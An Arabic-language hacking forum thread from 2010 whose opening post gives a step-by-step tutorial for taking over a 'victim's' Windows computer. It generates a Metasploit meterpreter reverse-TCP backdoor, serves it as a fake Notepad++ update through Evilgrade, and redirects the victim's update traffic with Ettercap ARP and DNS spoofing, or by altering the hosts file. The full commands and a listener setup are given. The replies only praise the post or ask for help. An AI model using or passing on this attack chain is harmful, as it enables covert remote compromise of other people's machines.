التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] > MetaSploit

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 01-15-2010, 07:50 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
إحصائية العضو






MATRIX ALGERIA غير متواجد حالياً

إرسال رسالة عبر Skype إلى MATRIX ALGERIA

 

 

إحصائية الترشيح

عدد النقاط : 10
MATRIX ALGERIA is on a distinguished road

افتراضي اختراق نظام ويندوز عن طريق تحديث ملغم


بسم الله الرحمان الرحيم
اليوم
سنقوم في هذا الاختراق بعمل تحديث وهمي وارساله الى برنامج على جهاز الضحية
البرامج التى يمكن تزييف تحديثاتها:
·sunjava
·winzip
·winamp
·itunes
·speedbit
·openoffice
·linkedin
·osx
·notepadplus
·dap
في هذا الشرح سنستخدم برنامج notepad++
و ستكون طريقة العمل كالاتي :
1.نقوم بتكوين Backdoor باستخدام مشروع ميتاسبلويت بالخيارات التي تناسبنا.
2.استخدام مشروع Evilgrade الذي سيقوم بتشغيل Web Server يحتوي على تحديث مزيّف لبرنامج Notepad++.
3.استخدام برنامج Ettercap لعمل dns spoofing و بالتالي تحويل أي طلب مرسل لموقع Notepad++ الى الويب سيرفر الذي قام Evilgrade بتشغيله.(اذا كنا متصلين بالضحية عن طريق الشبكة المحلية)
و اذا كنا متصلين بها عن طريق الانترنت فعلينا تغيير ملف hosts
الموجود بمسارC:\Windows\System32\drivers\etc
على جهاز الضحية (سنتطرق الى هذا لاحقا)
لنبدء الشرح (ساستخدم نظام لينكس في الشرح )
نفتح شيل ونكتب الامر

/metasploit/msfpayload windows/meterpreter/reverse_tcp LHOST=ip LPORT=port X > agent.exe
حيث
Metasploit: مسار برنامج ميتاسبلويت
Reverse_tcp:لاختيار الاتصال العكسي
ip:ايبي جهازك
PORT:البورت
Agent.exe:اسم الباكدور (اتركه كما هو)
الان كوننا الباك دور نقوم بنقله الى برنامج evilgrade
بالامر:
cp agent.exe /pentest/evilgrade/agent
حيث pentest هو مسار البرنامج
سيسئلك اذا كنت تريد استبدال الباكدور بالباكدور الذي ياتي مع البرنامج اجب بنعم
الان نقوم بالتنصت على البورت الذي اخترناه بالامر
/metasploit/msfconsole
حيث
Metasploit: مسار برنامج ميتاسبلويت
Use exploit/multi/handler
set LHOST=ip
ip:ايبي جهازك
set LPORT=port
PORT:البورت
set payload windows/meterpreter/reverse_tcp
exploit
تم التنصت الان نشغل evilgrade
نفتح شيل جديد و نكتب
Cd /pentest/evilgrade
./evilgrade
Conf notepadplus
Show option
الان نسجل قيمة ال virtual host و هي notepad-plus.sourceforge.net
ذلك هو الدومين الذي سنستعمله ثم نشغل السيرفر بالامر
Start
كل شيئ تمام ماعلينا الان الى عمل ال دي ا ناس سبوفينق

نفتح شيل جديد نحول صلاحيتنا الى رووت
Su root
نفعل ip forwarding :
Echo 1 > proc/sys/net/ipv4/ip_forward
نفتح etter.dns
Nano /usr/ettercap/etter.dns
حيث usr : مسار البرنامج
نغيير www.microsoft.com الى notepad-plus.sourceforge.net
و الايبي المقابل الى ايبي جهازنا نحفظ التغييرات و نخرج
نكتب الامر
// Ettercap –T –q –M arp:remote –P dns_spoof –i eth0
حيث eth0هو ال interface
تم الامر الان حينما تفتح الضحية برنامج notepadplus ستفتح له نافذة تخبره بوجود تحديثات وحينما يوافق على التحديث سيتم تنزيل الباكدور و تشغيله على جهاز الضحية و عليك الاختراق
هذا بالنسبة للوكال وبالنسبة للانترنت الحل هو اضافة الدومين وال ايبي الى ملف hosts

ثم استبداله في جهاز الضحية (من الافضل الاكتفاء بهذا الاختراق في الشبكات المحلية)
تحميل : http://www.infobyte.com.ar/developments.htmlevilgrade
تحميل : http://www.ettercap.sourceforge.net ettercap
تحميل :http://www.metasploit.com metasploit


منقول : )



hojvhr k/hl ,dk],. uk 'vdr jp]de lgyl

التوقيع

http://www.monsterup.com/upload/1216230399.gif
http://www.photoanon.com/images/r7pp...ktybcm60e2.jpg
THE MATRIX ALGERIA

[rainbow]حصريا..دورة تعلم واتقان لغة البرجمة C++[/rainbow]

موقع النبي صلى الله عليه وسلم

امحي ذنوبك في دقيقتين
http://www.shbab1.com/2minutes.htm
تحيا الجزائر حتى الموت
الجزائر مع فلسطين ظالمة او مظلومة
http://www.monsterup.com/upload/1216230399.gif

 


التعديل الأخير تم بواسطة ThE BiGeSt JoKeR ; 01-16-2010 الساعة 06:08 PM.

   

رد مع اقتباس
قديم 01-16-2010, 05:51 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
إحصائية العضو






ThE BiGeSt JoKeR غير متواجد حالياً

إرسال رسالة عبر Skype إلى ThE BiGeSt JoKeR

 

 

إحصائية الترشيح

عدد النقاط : 10
ThE BiGeSt JoKeR is on a distinguished road

افتراضي


جيد اخي .. طريقه ذكيه ..

شكرا لك على نقلك ^_^

التوقيع

انتبه ...
جيوش الـ Metasploit ستزور العناكب



نحن قوم لا نحب الغرور .. لكن الزمن سمح لنا بالتباهي .. لأننا ملوك


[/COLOR]

on vbspiders only

 

   

رد مع اقتباس
قديم 02-05-2010, 06:32 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية punisher77
 

 

 
إحصائية العضو





punisher77 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
punisher77 is on a distinguished road

افتراضي salut


مشكور موضوع جيد و لكن بخصوص برنامج evilgrade لم انجح في تنصيبه

التوقيع

http://www.vbspiders.com/vb/members/...1-user7796.jpg

 

   

رد مع اقتباس
قديم 02-13-2010, 05:37 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية blablabou94
 

 

 
إحصائية العضو







blablabou94 غير متواجد حالياً

إرسال رسالة عبر MSN إلى blablabou94

 

 

إحصائية الترشيح

عدد النقاط : 10
blablabou94 is on a distinguished road

افتراضي


إذاكنت تريد أن يكون موضوعك روعة أعمل تسجيل امتع فيديو أعز شيء يا أخي و تسهل التفسير لي و للاخرين والله ....نصيحة لي إني لم أفهم من المرحلة الأولى
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
فيديو: استخدام Evilgrade , Metasploit و Ettercap لاختراق نظام ويندوز رفيق صعابنة WIFI Attack 7 02-10-2012 12:43 PM


الساعة الآن 11:24 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0